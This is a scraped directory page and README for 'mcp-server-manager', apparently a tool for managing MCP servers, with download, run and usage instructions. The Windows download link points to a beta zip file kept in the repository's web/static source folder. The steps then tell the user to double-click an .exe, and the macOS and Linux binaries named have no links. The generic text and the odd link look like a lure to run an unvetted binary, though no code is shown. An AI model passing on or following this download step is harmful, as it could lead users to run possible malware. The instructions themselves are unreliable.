Manager
βοΈ Manage MCP servers effortlessly with a single binary and simple YAML config, supporting multiple clients and systems, all through a user-friendly interface.
Installation
npx mcp-server-managerAsk AI about Manager
Powered by Claude Β· Grounded in docs
I know everything about Manager. Ask me about installation, configuration, usage, or troubleshooting.
0/500
Reviews
Documentation
π₯οΈ mcp-server-manager - Manage Your MCP Servers Easily
π¦ Overview
mcp-server-manager is a user-friendly tool designed for managing Model Context Protocol (MCP) servers. This software is built using Go and offers a reactive HTMX web interface. Whether on Windows, macOS, or Linux, you can easily handle your MCP servers without needing programming knowledge.
π Getting Started
Follow these steps to download and run mcp-server-manager smoothly on your computer.
π₯ Download & Install
-
Visit the Releases page to download.
-
On this page, you will see various versions of mcp-server-manager. Choose the version that fits your operating system.
-
Click on the link for the appropriate file to start the download. The files might look like this:
https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zipfor Windowsmcp-server-manager-macos-amd64for macOSmcp-server-manager-linux-amd64for Linux
-
Once downloaded, locate the file on your computer.
-
Execute the following steps based on your operating system:
π₯οΈ For Windows:
- Double-click on the
.exefile to run it. A command window will open, and the application will start.
π For macOS:
- Open your terminal.
- Navigate to where the downloaded file is located using the
cdcommand. For example:cd Downloads - Make the file executable by typing:
chmod +x mcp-server-manager-macos-amd64 - Run the application using:
./mcp-server-manager-macos-amd64
π§ For Linux:
- Open your terminal.
- Navigate to the directory where the file was downloaded:
cd ~/Downloads - Make the file executable:
chmod +x mcp-server-manager-linux-amd64 - Execute the application:
./mcp-server-manager-linux-amd64
- Double-click on the
π How to Use mcp-server-manager
Once the application is running, you will see a web interface open in your default browser. Hereβs how to navigate it:
- Dashboard: Here you can view the status of your MCP servers. You'll find a list of all current servers along with their statuses.
- Configuration: Use the configuration section to set up and manage your servers. You can modify settings, add new servers, or delete existing ones.
- Logs: Access the logs to monitor server activity. This will provide a detailed view of server operations.
- Help Section: For any questions or tips on using features, refer to the help section within the app.
βοΈ System Requirements
To run mcp-server-manager, your system should meet the following requirements:
- Operating System: Windows 10 or higher, macOS 10.13 or higher, or a recent version of a Linux distribution (e.g., Ubuntu 20.04 or higher).
- Go: The software does not require Go to be installed on your machine. It is a single binary application.
- Memory: Minimum 2 GB of RAM recommended for smooth operation.
- Storage: At least 100 MB of free disk space.
π οΈ Features
- Cross-Platform: Works on Windows, macOS, and Linux.
- Single Binary: Easily download and run without complicated installations.
- User-Friendly Interface: Designed for ease of use with a simple web interface.
- Real-time Updates: Manage server configurations and settings in real-time.
- Community Support: Join a community of users for tips and support.
π Need Help?
If you encounter issues or have questions about using mcp-server-manager, check the GitHub Discussions for support. You can also open an issue directly on the repository page for additional help.
ποΈ Acknowledgments
Thanks to the contributors and the community that supports the development of mcp-server-manager. Your feedback and contributions help us improve this tool.
π£ License
This project is licensed under the MIT License. See the LICENSE file for details.
π Links
Thank you for using mcp-server-manager. Enjoy managing your MCP servers with ease!
